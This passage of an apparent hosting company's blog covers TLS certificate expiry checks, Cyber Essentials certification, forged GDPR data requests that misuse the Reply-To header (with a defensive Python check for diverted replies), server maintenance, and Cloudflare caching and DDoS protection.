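    """Read the notAfter field from a live server's certificate (needs network)."""
    context = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=10) as sock:
        with context.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert()["notAfter"]
```

A scheduled job could call `needs_renewal(fetch_not_after("www.example.com"), datetime.now(timezone.utc))` for each hosted domain and raise an alert whenever it returns `True`.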

Infotex are proud of the technical standards we work to and have recently decided that the time is right to demonstrate this. We are therefore currently working with external advisors to obtain the Cyber Essentials and Cyber Essentials Plus certifications.

For those who are not familiar, Cyber Essentials is a program backed by the UK Government’s National Cyber Security Centre (https://www.ncsc.gov.uk/cyberessentials/overview) to verify that we are providing controls to mitigate the majority of cyber attacks and demonstrate that we can, and do, handle your sensitive data correctly.

To be clear, this is not related to DDoS type attacks. Instead it demonstrates controls (including timely installation of security updates and use of multi-factor login to our core systems) that will deter the much more common hacker attacks. It also demonstrates the security awareness and controls that reduce the likelihood of Infotex suffering from the ransomware attacks which are sadly so prevalent today.

Related to the above two items, over the last year we have invested heavily in new computer hardware for our team members to ensure that everyone has an environment which allows them to make the most of their skills, in turn delivering the best technical solutions and advice for our clients.

As any regular readers will be aware, the GDPR is a regulation of the European Union which came into force in May 2018. It is designed to give individuals (formally called data subjects) far-reaching control over their personal data, with severe penalties for any bodies (formally called data controllers) who fail to protect that data, causing a data breach, or who fail to act in accordance with the existing agreement with the individual.

Two of the key tenets of the regulation are the right of access and the right of erasure:

A Data Subject Access Request could be summarised as allowing the individual to ask a data controller what personal information it, and its sub-processors, hold about them, to request a copy of this data, and to be told how this data is processed on their behalf. Typically this takes the form of an email or online form that the individual completes with their name and minimally identifying information. This is sent to the controller, who responds within 30 days with the full data set in the most human-readable form possible.

The Right to Erasure, also known as the right to be forgotten, is similarly summarised as allowing individuals to make a request instructing that the information previously provided be deleted in whole or in part. The controller must comply by erasing this data, or by anonymising it in such a way that it can no longer be linked to the individual.

GDPR is certainly well-meaning but, as is so often the case, the issue arises in the implementation of these powers by Data Controllers.



In short, attackers have discovered that many companies, in their role as Data Controller, do not validate who made the request before providing or erasing the data.

Let’s take a simple example. Our attacker is looking for information to commit identity fraud against Mr Bloggs, so they contact Company A, who receive an email like the one below:

Stop for a moment and imagine you received this request with your email address in the To: field. Would you process the request and reply to Mr Bloggs with the requested information?

Are you quite sure??

Look carefully at the below screenshot of where your reply would actually be sent to:



The trick here is that the attacker used a long-established email header called Reply-To. The original email is faked so that it appears to originate from mrbloggs@gmail.com, while the response is sent to an entirely different address, attacker@infotex.uk in this example.

If the above response was sent with an attachment containing all the personal information held about Mr Bloggs, then that personal data would now be in the hands of the attacker helping them to conduct whatever identity fraud they had in mind.

By the simple act of sharing this information without Mr Bloggs’ explicit consent, Company A have just unwittingly caused a data breach, for which they could be prosecuted under the very GDPR that they thought they were complying with.

In the case of Right to Erasure requests, many companies simply permanently delete, or anonymise, the customer’s data and reply confirming that this has been erased. This can be even worse, as the attacker has no need for a Reply-To header: they simply fake the email address the request came from and Mr Bloggs’ data is deleted. The first he knows of it is when he next contacts Company A and finds that they no longer know anything about him, potentially losing any files, order history, product warranties etc. held by them on his behalf.

If such requests are blindly processed, the data has been destroyed before the actual individual knows anything about it. The attacker may even add a CC so that the company lets them know that the data has been deleted as well!

The first thing is to ensure that you scrutinise any requests received, in particular ensuring that the email address you are replying to is the account you hold on record.

As the regulation allows up to 30 days to comply with such a request, you may also wish to send an email to, or call, Mr Bloggs (taking care not to reply to the original email) to confirm and validate the request. This may also bring customer service benefits: any grievance that has led to a legitimate request can be dealt with more amicably, and a legitimate customer has the chance to respond and query a request they did not make.

If you have automated systems to process requests, test how they handle reply-to and CC email headers to ensure that they are not allowing data to be handled in unintended ways.
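As a starting point for such a test, here is a minimal sketch in Python using only the standard library `email` package. The function name `review_request` and the warning wording are hypothetical, and the check assumes you already hold an email address on record for the individual.

```python
from email import message_from_string
from email.utils import getaddresses, parseaddr


def review_request(raw_email: str, address_on_record: str) -> list[str]:
    """Return warnings about headers that could divert a reply elsewhere."""
    msg = message_from_string(raw_email)
    record = address_on_record.lower()
    warnings = []

    # The visible sender should match the address held on record.
    sender = parseaddr(msg.get("From", ""))[1].lower()
    if sender != record:
        warnings.append(f"From differs from the address on record: {sender}")

    # Reply-To and Cc can silently send the response to a third party.
    for header in ("Reply-To", "Cc"):
        for _, addr in getaddresses(msg.get_all(header, [])):
            if addr and addr.lower() != record:
                warnings.append(
                    f"{header} differs from the address on record: {addr.lower()}"
                )
    return warnings


EXAMPLE = (
    "From: Mr Bloggs <mrbloggs@gmail.com>\n"
    "Reply-To: attacker@infotex.uk\n"
    "To: privacy@company-a.example\n"
    "Subject: Subject access request\n"
    "\n"
    "Please send me all the data you hold about me.\n"
)

print(review_request(EXAMPLE, "mrbloggs@gmail.com"))
```

An empty list of warnings is not proof that a request is genuine, because the From address itself can be faked. Confirming with the individual through a separate, known channel is still needed.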

Credit to Hx01 (https://twitter.com/hxzeroone) whose paper inspired this post.

Infotex maintains and supports more than 700 websites belonging to over 600 of our clients. We regard keeping these websites secure, stable and fast on our servers as being of equal importance to their original design and build.

So we thought we would share with you some insights into the sort of things we get up to behind the scenes. The bulk of the work is either carried out by, or under the direction of, our infrastructure manager John Harman, aka “Moz”, who has worked at Infotex since its inception 21 years ago(!).

We call this series “keeping the green lights on”, because Moz’s main aim is to avoid any amber or red lights coming on… And if they do, he likes to be the first to know about it, so he can resolve issues quickly.

All server loads are checked daily along with validating various health metrics such as disk/memory/processor usage and ensuring our backups are all running smoothly.
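To give a flavour of what a check like this can look like, here is a small Python sketch that turns a usage percentage into a green, amber or red light. The 80% and 90% thresholds and the function names are assumptions for illustration, not the values or tooling Infotex actually uses.

```python
import shutil

AMBER_AT = 80.0  # hypothetical threshold: start paying attention
RED_AT = 90.0    # hypothetical threshold: act now


def light(percent_used: float, amber_at: float = AMBER_AT, red_at: float = RED_AT) -> str:
    """Map a usage percentage to a traffic-light status."""
    if percent_used >= red_at:
        return "red"
    if percent_used >= amber_at:
        return "amber"
    return "green"


def disk_percent_used(path: str = "/") -> float:
    """Percentage of the disk holding `path` that is currently in use."""
    usage = shutil.disk_usage(path)
    return 100.0 * usage.used / usage.total
```

Calling `light(disk_percent_used("/"))` on a server gives a single status that can be fed into a dashboard or an alert. Memory and processor figures could be classified in the same way.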

At least once per week every server is checked to ensure that it has all the latest security updates installed.

In addition to the above updating that is done during routine operating hours, we also perform some out-of-hours work to update items which require taking them offline briefly.

We have recently added new servers to our fleet. This helps our capacity keep up with demand, as well as allowing us to make incremental modernisation steps which will soon see us dispense with some old servers that are no longer capable of delivering what we need.

All WordPress sites have been, or are in the process of being, updated to the latest WordPress version and plugin versions. This is essential in ensuring that our clients’ websites remain secure and performant.

For many WordPress clients, we added in some key Infotex baseline functionality for 2 features:

CentOS is a reliable and fast Linux operating system. We are continuing work to upgrade the operating system upon which most of our websites run, to ensure that they are fast, secure and continue to operate smoothly.

We have long recommended using Cloudflare to boost our customers’ site speed and enhance their security. While it’s not relevant to everyone, it is a useful tool to have in the arsenal to protect and improve your site’s performance.

Cloudflare have been around since 2009 and provide their services to around 25 million websites. At its most basic, Cloudflare is a content delivery network (CDN) which sits between your website and your visitors, providing a robust performance and security layer before visitors (or hackers) touch the server hosting your site – think of it as a bouncer on the door to your site.

It has two main benefits:

Normally, when you type www.example.com it is translated to an IP address and your request is sent to our server, which responds with the components for the page you’ve requested.

For a Cloudflare site, you type a domain name and connect to the closest server in Cloudflare’s network, which spans over 250 cities. They will then validate your request against various rules so as to recognise and reject nefarious hack attempts such as SQL injection, known bad bots, and content spam. Because Cloudflare covers millions of sites across the world, they analyse over 20 million requests per second to detect dodgy activity and common attacks, stopping them before they get to your site. This scale allows them to witness behaviour across their entire network and often block new classes of attack (aka Zero-Days) before the patches are even available.

As well as this, Cloudflare ‘caches’ your site, creating copies on their servers distributed around the world and so improving loading speed. For instance, when a new user visits your site from, say, Sydney in eastern Australia, Cloudflare will have it delivered from our server in the UK. However, when a second viewer in Sydney makes the same request soon after, they will see the copy that’s already stored on Cloudflare’s server in Sydney, thus significantly speeding up the page load. It’s even possible for a viewer from Melbourne, in south-eastern Australia, to hit their local server and also benefit from that first Sydney viewer, due to regional caching.
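The Sydney and Melbourne example can be modelled in a few lines of Python. This is a toy sketch of tiered caching, not Cloudflare's actual implementation: the class names are hypothetical, and real caches also expire content after a set time, which is left out here.

```python
class Origin:
    """Stands in for the original web server in the UK."""

    def __init__(self):
        self.requests_served = 0

    def fetch(self, path: str) -> str:
        self.requests_served += 1
        return f"content of {path}"


class Cache:
    """A cache that asks its upstream only when it has no stored copy."""

    def __init__(self, name: str, upstream):
        self.name = name
        self.upstream = upstream
        self.store = {}

    def fetch(self, path: str) -> str:
        if path not in self.store:
            self.store[path] = self.upstream.fetch(path)
        return self.store[path]


origin = Origin()
regional = Cache("australia-regional", origin)
sydney = Cache("sydney", regional)
melbourne = Cache("melbourne", regional)

sydney.fetch("/")     # first Sydney viewer: travels all the way to the origin
sydney.fetch("/")     # second Sydney viewer: served from the Sydney copy
melbourne.fetch("/")  # Melbourne viewer: served from the regional copy
print(origin.requests_served)
```

In this model the origin server is asked for the page only once, however many viewers in the region request it afterwards.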

Cloudflare also offers access to servers located within China which, subject to certain conditions, can be used to reach the Chinese markets, which are often otherwise restricted by their government’s tight control of internet access.



Other benefits of caching include the ability to deliver automatically optimised versions of web images, and compress dynamic content, further speeding up delivery time. This can be used to keep hosting costs down. It is also especially useful for sites that need to scale up and down with peaks of traffic (such as during newsletter delivery) but are comparatively quiet the rest of the time.

The customisation options for Cloudflare are almost limitless: it offers a range of configurable rules and, for more complex requirements, the ability to run custom code on their regional servers.

Infotex’s technical understanding and experience of working with Cloudflare allow us to utilise these capabilities to the full. The following are some examples of how Cloudflare has helped our clients over recent years.

We have seen and dealt first-hand with our ecommerce customers being sent ransom requests for thousands of pounds with a threat of taking their site offline. When these requests are (rightly) ignored by our client, their sites are subjected to a huge DDoS attack, where thousands of requests are sent every second, which would often overload the server and take the site offline (and any other sites on that server). Our solution to these attacks has been to migrate the domain over to a server with Cloudflare protection, which has built-in DDoS protection. This way, while the attack continues, Cloudflare’s protection can shrug it off and enable trading to continue as normal.

Cloudflare has protected some of our clients who were receiving high levels of attack traffic from countries such as China and Russia, which are not countries they manage their websites from. This allowed admin requests, or all requests, from these countries to be blocked by Cloudflare or subjected to more stringent validation. In either case the viewer would be met with a fully branded page explaining why their request was declined, without the request ever touching our original server.

One client needed help scaling their WordPress-powered sites to handle their stories going viral, while operating at a low cost between periods of high demand. By utilising Cloudflare’s ability to cache full page contents and use tiered regional caches, we have been able to create a site that updates the latest content in a timely manner, while achieving a 95+% cache rate on the terabytes of data the site drives. Letting Cloudflare do most of the heavy lifting keeps their hosting costs lower than having servers that could deal with the demand.

For people sending newsletters there are often unique tracking parameters on website links, meaning that traditional caching would not work. In some cases Cloudflare enabled us to develop code that runs on Cloudflare’s servers to identify these parameters, and so we were able to increase the cache rate for newsletter traffic from around 10% to over 90%, thus massively reducing the traffic spikes these newsletters cause. In less technical language, it made the pages load quicker and improved the customer experience.
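The idea behind this can be sketched as follows. The example is written in Python purely for illustration and is not the code that runs on Cloudflare's servers. The parameter names treated as tracking (`utm_*`, `mc_cid`, `mc_eid`) are assumptions; a real site would list whichever parameters its newsletter tool adds.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Assumed tracking parameters; adjust to match the newsletter tool in use.
TRACKING_PREFIXES = ("utm_",)
TRACKING_PARAMS = {"mc_cid", "mc_eid"}


def cache_key(url: str) -> str:
    """Return the URL with tracking parameters removed, for use as a cache key."""
    parts = urlsplit(url)
    kept = [
        (name, value)
        for name, value in parse_qsl(parts.query, keep_blank_values=True)
        if not name.startswith(TRACKING_PREFIXES) and name not in TRACKING_PARAMS
    ]
    kept.sort()  # so that parameter order does not create separate cache entries
    return urlunsplit((parts.scheme, parts.netloc, parts.path, urlencode(kept), ""))
```

With this in place, `https://www.example.com/news?utm_source=newsletter&page=2` and `https://www.example.com/news?page=2&utm_campaign=june` both map to the same key, so the second visitor can be served the cached copy instead of generating a fresh request to the server.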

If you’re an existing Infotex customer, get in touch to find out how Cloudflare could help protect your online investment.
